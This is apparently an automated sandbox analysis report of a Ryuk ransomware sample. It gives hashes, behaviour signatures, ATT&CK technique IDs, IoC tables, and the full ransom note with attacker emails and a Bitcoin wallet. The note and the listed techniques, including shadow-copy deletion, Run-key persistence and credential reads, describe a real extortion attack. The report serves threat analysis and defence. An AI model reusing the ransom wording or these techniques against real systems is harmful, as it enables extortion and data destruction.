ryuk | bf690b438268c48bfe5c73fad5c4acfe786c68eddeceecd3ac452d4e1832922c

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
05-12-2024 11:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
Size

79KB
MD5

6d7d0a07024e8e61ed94a14b96490f81
SHA1

a81ebdcfd566066d32d582a299fbbee946e4c310
SHA256

bf690b438268c48bfe5c73fad5c4acfe786c68eddeceecd3ac452d4e1832922c
SHA512

781328a9fd68ed362c5fd538e9e99dd1db8d800cb01b36fb7f1c57b865f747b55b1ae6fb45107d5a5306e8926ad9f08abfbfd9eefb116ee0ad27f711efeac177
SSDEEP

1536:uBzyvLtPO7Pr90tG3yEJ0gJVlp8swKDsGULa5UUc6ahF98aaTpflFTTJovD:uB2+90tiV0EdJNaZ9wpfltTJ

Score

10^/10

ryuk defense_evasion discovery execution impact persistence ransomware spyware stealer upx

Malware Config

Extracted

Path

C:\RyukReadMe.txt

Family

ryuk

Ransom Note

Gentlemen! Your business is at serious risk. There is a significant hole in the security system of your company. We've easily penetrated your network. You should thank the Lord for being hacked by serious people not some stupid schoolboys or dangerous punks. They can damage all your important data just for fun. Now your files are crypted with the strongest millitary algorithms RSA4096 and AES-256. No one can help you to restore files without our special decoder. Photorec, RannohDecryptor etc. repair tools are useless and can destroy your files irreversibly. If you want to restore your files write to emails (contacts are at the bottom of the sheet) and attach 2-3 encrypted files (Less than 5 Mb each, non-archived and your files should not contain valuable information (Databases, backups, large excel sheets, etc.)). You will receive decrypted samples and our conditions how to get the decoder. Please don't forget to write the name of your company in the subject of your e-mail. You have to pay for decryption in Bitcoins. The final price depends on how fast you write to us. Every day of delay will cost you additional +0.5 BTC Nothing personal just business As soon as we get bitcoins you'll get all your decrypted data back. Moreover you will get instructions how to close the hole in security and how to avoid such problems in the future + we will recommend you special software that makes the most problems to hackers. Attention! One more time ! Do not rename encrypted files. Do not try to decrypt your data using third party software. P.S. Remember, we are not scammers. We don`t need your files and your information. But after 2 weeks all your files and keys will be deleted automatically. Just send a request immediately after infection. All data will be restored absolutely. Your warranty - decrypted samples. contact emails [email protected] or [email protected] BTC wallet: 1NQ42zc51stA4WAVkUK8uqFAjo1DbWv4Kz Ryuk No system is safe

Emails

[email protected]

Wallets

1NQ42zc51stA4WAVkUK8uqFAjo1DbWv4Kz

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk
Ryuk family
ryuk
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Drops startup file 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\RyukReadMe.txt	taskhost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\RyukReadMe.txt	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\RyukReadMe.txt	Dwm.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\RyukReadMe.txt	DllHost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe"	reg.exe

Enumerates connected drives 3 TTPs 49 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2104-0-0x000000013FD40000-0x000000013FD79000-memory.dmp	upx
behavioral1/memory/1092-3-0x000000013FD40000-0x000000013FD79000-memory.dmp	upx
behavioral1/memory/2476-16-0x000000013FD40000-0x000000013FD79000-memory.dmp	upx
behavioral1/memory/2480-46-0x000000013FD40000-0x000000013FD79000-memory.dmp	upx
behavioral1/memory/1092-30754-0x000000013FD40000-0x000000013FD79000-memory.dmp	upx
behavioral1/memory/2104-30844-0x000000013FD40000-0x000000013FD79000-memory.dmp	upx
behavioral1/memory/1160-30860-0x000000013FD40000-0x000000013FD79000-memory.dmp	upx
behavioral1/memory/1328-30876-0x000000013FD40000-0x000000013FD79000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins_1.1.200.v20131119-0908.jar	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\RyukReadMe.txt	DllHost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0103262.WMF	DllHost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TAIL.WMF	taskhost.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\RyukReadMe.txt	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html	DllHost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\vlc.mo	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0177257.JPG	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\it-IT\RyukReadMe.txt	Dwm.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_xml.luac	DllHost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\CHICAGO.XSL	DllHost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.properties	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.console_1.1.0.v20140131-1639.jar	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGATNGET.DPV	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Guayaquil	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME33.CSS	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\LOOKUP.DAT	taskhost.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Qatar	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01246_.GIF	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Istanbul	Dwm.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\RyukReadMe.txt	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL111.XML	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\RyukReadMe.txt	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382942.JPG	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\GREETING.DPV	Dwm.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Fakaofo	DllHost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\GostTitle.XSL	DllHost.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\RyukReadMe.txt	taskhost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\packetizer\RyukReadMe.txt	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN010.XML	DllHost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\QP.DPV	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18201_.WMF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME38.CSS	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\XLSTART\RyukReadMe.txt	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00045_.WMF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01749_.GIF	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\INFOMAIL.CFG	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-output2.xml	DllHost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\images\buttons.png	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl\TAB_OFF.GIF	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\OrielLetter.Dotx	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_rgb.wmv	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\RyukReadMe.txt	Dwm.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PSRCHSRN.DAT	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\about.html	Dwm.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\fr-FR\RyukReadMe.txt	Dwm.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs-nio2.jar	taskhost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR27F.GIF	taskhost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\high-contrast.css	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-attach.xml	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Stationery\1033\CURRENCY.HTM	DllHost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\HST	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\ado\ja-JP\RyukReadMe.txt	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.xml	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_zh_CN.jar	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\Bibliography\BIBFORM.XML	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-nodes.xml	Dwm.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\de-DE\RyukReadMe.txt	DllHost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Faculty.accdt	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
File opened for modification	C:\Program Files\Internet Explorer\de-DE\RyukReadMe.txt	DllHost.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_zh_4.4.0.v20140623020002.jar	DllHost.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\Microsoft.Office.InfoPath.xml	taskhost.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\it\RyukReadMe.txt	taskhost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Interacts with shadow copies 3 TTPs 46 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
8288	vssadmin.exe
8432	vssadmin.exe
6480	vssadmin.exe
6552	vssadmin.exe
7688	vssadmin.exe
7852	vssadmin.exe
7908	vssadmin.exe
8232	vssadmin.exe
2284	vssadmin.exe
5376	vssadmin.exe
6360	vssadmin.exe
6964	vssadmin.exe
8640	vssadmin.exe
8016	vssadmin.exe
8316	vssadmin.exe
5320	vssadmin.exe
6264	vssadmin.exe
6832	vssadmin.exe
7740	vssadmin.exe
7768	vssadmin.exe
7796	vssadmin.exe
8584	vssadmin.exe
8528	vssadmin.exe
6424	vssadmin.exe
7100	vssadmin.exe
7032	vssadmin.exe
7936	vssadmin.exe
8044	vssadmin.exe
8460	vssadmin.exe
6720	vssadmin.exe
6776	vssadmin.exe
7960	vssadmin.exe
8076	vssadmin.exe
8348	vssadmin.exe
8696	vssadmin.exe
7824	vssadmin.exe
7988	vssadmin.exe
8376	vssadmin.exe
6608	vssadmin.exe
8404	vssadmin.exe
8488	vssadmin.exe
5676	vssadmin.exe
6664	vssadmin.exe
6896	vssadmin.exe
7880	vssadmin.exe
8260	vssadmin.exe

Kills process with taskkill 44 IoCs

evasion

pid	Process
1752	taskkill.exe
2952	taskkill.exe
2128	taskkill.exe
356	taskkill.exe
904	taskkill.exe
2864	taskkill.exe
2972	taskkill.exe
2068	taskkill.exe
2472	taskkill.exe
112	taskkill.exe
3056	taskkill.exe
1588	taskkill.exe
2088	taskkill.exe
1360	taskkill.exe
1900	taskkill.exe
1492	taskkill.exe
1620	taskkill.exe
3144	taskkill.exe
2912	taskkill.exe
3064	taskkill.exe
2584	taskkill.exe
2656	taskkill.exe
1512	taskkill.exe
1980	taskkill.exe
3204	taskkill.exe
2076	taskkill.exe
2360	taskkill.exe
2232	taskkill.exe
2776	taskkill.exe
768	taskkill.exe
684	taskkill.exe
1108	taskkill.exe
2272	taskkill.exe
2392	taskkill.exe
2880	taskkill.exe
3028	taskkill.exe
2984	taskkill.exe
860	taskkill.exe
2540	taskkill.exe
840	taskkill.exe
2476	taskkill.exe
1468	taskkill.exe
1052	taskkill.exe
2496	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

description	pid	Process
Token: SeDebugPrivilege	2360	taskkill.exe
Token: SeDebugPrivilege	2476	taskkill.exe
Token: SeDebugPrivilege	2392	taskkill.exe
Token: SeDebugPrivilege	2880	taskkill.exe
Token: SeDebugPrivilege	2912	taskkill.exe
Token: SeDebugPrivilege	2232	taskkill.exe
Token: SeDebugPrivilege	3064	taskkill.exe
Token: SeDebugPrivilege	2864	taskkill.exe
Token: SeDebugPrivilege	3028	taskkill.exe
Token: SeDebugPrivilege	2584	taskkill.exe
Token: SeDebugPrivilege	2656	taskkill.exe
Token: SeDebugPrivilege	1468	taskkill.exe
Token: SeDebugPrivilege	2972	taskkill.exe
Token: SeDebugPrivilege	2776	taskkill.exe
Token: SeDebugPrivilege	768	taskkill.exe
Token: SeDebugPrivilege	1752	taskkill.exe
Token: SeDebugPrivilege	1512	taskkill.exe
Token: SeDebugPrivilege	2984	taskkill.exe
Token: SeDebugPrivilege	2068	taskkill.exe
Token: SeDebugPrivilege	2952	taskkill.exe
Token: SeDebugPrivilege	2088	taskkill.exe
Token: SeDebugPrivilege	860	taskkill.exe
Token: SeDebugPrivilege	684	taskkill.exe
Token: SeDebugPrivilege	2128	taskkill.exe
Token: SeDebugPrivilege	356	taskkill.exe
Token: SeDebugPrivilege	1108	taskkill.exe
Token: SeDebugPrivilege	1052	taskkill.exe
Token: SeDebugPrivilege	840	taskkill.exe
Token: SeDebugPrivilege	2540	taskkill.exe
Token: SeDebugPrivilege	2472	taskkill.exe
Token: SeDebugPrivilege	904	taskkill.exe
Token: SeDebugPrivilege	1360	taskkill.exe
Token: SeDebugPrivilege	2496	taskkill.exe
Token: SeDebugPrivilege	112	taskkill.exe
Token: SeDebugPrivilege	2272	taskkill.exe
Token: SeDebugPrivilege	1588	taskkill.exe
Token: SeDebugPrivilege	1900	taskkill.exe
Token: SeDebugPrivilege	3056	taskkill.exe
Token: SeDebugPrivilege	1492	taskkill.exe
Token: SeDebugPrivilege	2076	taskkill.exe
Token: SeDebugPrivilege	1620	taskkill.exe
Token: SeDebugPrivilege	1980	taskkill.exe
Token: SeDebugPrivilege	3204	taskkill.exe
Token: SeDebugPrivilege	3144	taskkill.exe
Token: SeDebugPrivilege	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe
Token: SeBackupPrivilege	1652	vssvc.exe
Token: SeRestorePrivilege	1652	vssvc.exe
Token: SeAuditPrivilege	1652	vssvc.exe

Suspicious use of UnmapMainImage 3 IoCs

pid	Process
1092	taskhost.exe
1160	Dwm.exe
1328	DllHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2104 wrote to memory of 2476	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	30
PID 2104 wrote to memory of 2476	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	30
PID 2104 wrote to memory of 2476	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	30
PID 2104 wrote to memory of 2360	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	32
PID 2104 wrote to memory of 2360	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	32
PID 2104 wrote to memory of 2360	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	32
PID 2104 wrote to memory of 2392	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	34
PID 2104 wrote to memory of 2392	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	34
PID 2104 wrote to memory of 2392	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	34
PID 2104 wrote to memory of 2232	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	36
PID 2104 wrote to memory of 2232	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	36
PID 2104 wrote to memory of 2232	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	36
PID 2104 wrote to memory of 2912	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	37
PID 2104 wrote to memory of 2912	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	37
PID 2104 wrote to memory of 2912	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	37
PID 2104 wrote to memory of 2880	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	40
PID 2104 wrote to memory of 2880	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	40
PID 2104 wrote to memory of 2880	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	40
PID 2104 wrote to memory of 3064	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	42
PID 2104 wrote to memory of 3064	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	42
PID 2104 wrote to memory of 3064	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	42
PID 2104 wrote to memory of 2864	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	44
PID 2104 wrote to memory of 2864	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	44
PID 2104 wrote to memory of 2864	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	44
PID 2104 wrote to memory of 3028	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	45
PID 2104 wrote to memory of 3028	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	45
PID 2104 wrote to memory of 3028	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	45
PID 2104 wrote to memory of 2584	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	48
PID 2104 wrote to memory of 2584	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	48
PID 2104 wrote to memory of 2584	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	48
PID 2104 wrote to memory of 2656	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	50
PID 2104 wrote to memory of 2656	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	50
PID 2104 wrote to memory of 2656	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	50
PID 2104 wrote to memory of 1468	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	53
PID 2104 wrote to memory of 1468	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	53
PID 2104 wrote to memory of 1468	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	53
PID 2104 wrote to memory of 2776	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	55
PID 2104 wrote to memory of 2776	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	55
PID 2104 wrote to memory of 2776	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	55
PID 2104 wrote to memory of 2972	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	57
PID 2104 wrote to memory of 2972	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	57
PID 2104 wrote to memory of 2972	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	57
PID 2104 wrote to memory of 768	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	59
PID 2104 wrote to memory of 768	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	59
PID 2104 wrote to memory of 768	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	59
PID 2104 wrote to memory of 1752	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	61
PID 2104 wrote to memory of 1752	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	61
PID 2104 wrote to memory of 1752	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	61
PID 2104 wrote to memory of 1512	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	63
PID 2104 wrote to memory of 1512	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	63
PID 2104 wrote to memory of 1512	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	63
PID 2104 wrote to memory of 2952	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	65
PID 2104 wrote to memory of 2952	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	65
PID 2104 wrote to memory of 2952	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	65
PID 2104 wrote to memory of 2984	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	67
PID 2104 wrote to memory of 2984	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	67
PID 2104 wrote to memory of 2984	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	67
PID 2104 wrote to memory of 2088	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	69
PID 2104 wrote to memory of 2088	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	69
PID 2104 wrote to memory of 2088	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	69
PID 2104 wrote to memory of 2068	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	71
PID 2104 wrote to memory of 2068	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	71
PID 2104 wrote to memory of 2068	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	71
PID 2104 wrote to memory of 860	2104	2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe	73

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Drops startup file
- Drops file in Program Files directory
- Suspicious use of UnmapMainImage
PID:1092
